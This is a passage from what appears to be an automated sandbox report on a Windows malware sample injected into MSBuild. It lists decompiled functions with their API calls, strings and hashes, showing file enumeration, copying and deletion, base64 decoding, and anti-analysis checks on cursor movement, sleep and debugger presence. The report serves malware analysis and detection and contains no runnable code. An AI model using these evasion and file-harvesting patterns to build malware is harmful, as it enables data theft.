Instruction Fuzzy Hash: D7514F71901240BFCA617BAE854DEF5B2D6AFA0328F14048FB404AA272DF6D8DD05D6D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 352223032d3244ad9dc512ea0f38e2caed61f8f95f67dbfdd7722c11f9f2bd61
Instruction ID: 70aa0c5f5db09bd9b177b6aa788367f122bed66c5b4d8e76533133e42ab6cc8a
Opcode Fuzzy Hash: 352223032d3244ad9dc512ea0f38e2caed61f8f95f67dbfdd7722c11f9f2bd61
Instruction Fuzzy Hash: B3F03AB2E0015DABDB15DF78DC909EEB7FCEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9

Function 0041C440 Relevance: 1.3, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041C451

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
Instruction ID: b821a3ed68e39ced0a1ee7d52ccadc00ba9e28cef2c83c113185a37151cab313
Opcode Fuzzy Hash: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
Instruction Fuzzy Hash: A221F6742007108FC320DF6ED495996B7F1FF49314B14486EEA8A8B722D776E880CB15

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 00415B0B Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 179filestringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
HeapAlloc.KERNEL32(00000000), ref: 00415B37
wsprintfA.USER32 ref: 00415B50
FindFirstFileA.KERNEL32(?,?), ref: 00415B67
StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86

Part of subcall function 0041580D: _memset.LIBCMT ref: 00415845
Part of subcall function 0041580D: _memset.LIBCMT ref: 00415856
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
Part of subcall function 0041580D: StrStrA.SHLWAPI(00000000), ref: 0041596A

DeleteFileA.KERNEL32(?), ref: 00415CA9
wsprintfA.USER32 ref: 00415BC9

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 00415CD8
FindClose.KERNEL32(?), ref: 00415CEC
lstrcatA.KERNEL32(?), ref: 00415D1A
lstrcatA.KERNEL32(?), ref: 00415D2D
lstrlenA.KERNEL32(?), ref: 00415D39
lstrlenA.KERNEL32(?), ref: 00415D56

Strings

K_A, xrefs: 00415DE8
%s\*, xrefs: 00415B4A
%s\%s, xrefs: 00415BC3

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
String ID: %s\%s$%s\*$K_A
API String ID: 2636950706-1624741228
Opcode ID: ced04bf2730adabb213893d9fef7c7aec05d546aa0bd8a97aa09d981d4b8c89c
Instruction ID: fe1309143821ccd60cf53d87d26b624eae82bf80c08df25afb7708329c163567
Opcode Fuzzy Hash: ced04bf2730adabb213893d9fef7c7aec05d546aa0bd8a97aa09d981d4b8c89c
Instruction Fuzzy Hash: C7713EB19002289BDF20EF60DD49ACD77B9AF49315F0004EAA609B3151EB76AFC5CF59

Function 0040B93F Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,00436826,?,?,?), ref: 0040B99B
StrCmpCA.SHLWAPI(?,0043743C), ref: 0040B9BC
StrCmpCA.SHLWAPI(?,00437440), ref: 0040B9D6

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001), ref: 0040BE0B

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 0040BE82

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
FindClose.KERNEL32(?), ref: 0040BF05

Strings

\*.*, xrefs: 0040B965

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2055012574-1173974218
Opcode ID: 942fd7e65550acf21277a91a5ee52214ae783f4726b1089d71da767fd9f56367
Instruction ID: 53a79bfc0dab0fc6023200b4e1e1ec652a5b9d3d115480c62788c8db81696fe3
Opcode Fuzzy Hash: 942fd7e65550acf21277a91a5ee52214ae783f4726b1089d71da767fd9f56367
Instruction Fuzzy Hash: 41E1DA7194012D9BCF21FB26DD4AACDB375AF44309F4100E6A508B71A1DB79AFC98F98

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 0042B1EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B22B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B254
GetACP.KERNEL32(?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B268

Strings

ACP, xrefs: 0042B1FB
OCP, xrefs: 0042B20C

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: dabdef429acf28403b0f87105750c87aa7dd444468e3f7da184b66417ca4622f
Instruction ID: 1d8a24c55ad27a2629b7a766668cf871eddc3622aa3f9d7e0ae662acd3c2ea88
Opcode Fuzzy Hash: dabdef429acf28403b0f87105750c87aa7dd444468e3f7da184b66417ca4622f
Instruction Fuzzy Hash: F101D831701716FAEB219B51FC4AF5F73A8DB45368F60009AF001E0581D778DA4192AD

Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Strings

$g@, xrefs: 00408056

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: $g@
API String ID: 4291131564-2623900638
Opcode ID: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction ID: e9494377cad346e2cb6e0c3413faafdb083af89deffb74abb579b147fff80950
Opcode Fuzzy Hash: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction Fuzzy Hash: 7EF03C70101334BBDF315F26DC4CE8B7FA9EF06BA1F100456F949E6250E7724A40DAA1

Function 0041D12A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D562
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D577
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D582
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D59E
TerminateProcess.KERNEL32(00000000), ref: 0041D5A5

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 81b757bedadb6aa414f3cbb5558a59dfea264c2a9b68c96a8667cab582a7df29
Instruction ID: 4bba9ff048c9058af47a45dce311be71d9a10e9393078c90d81800ef8cb4dbee
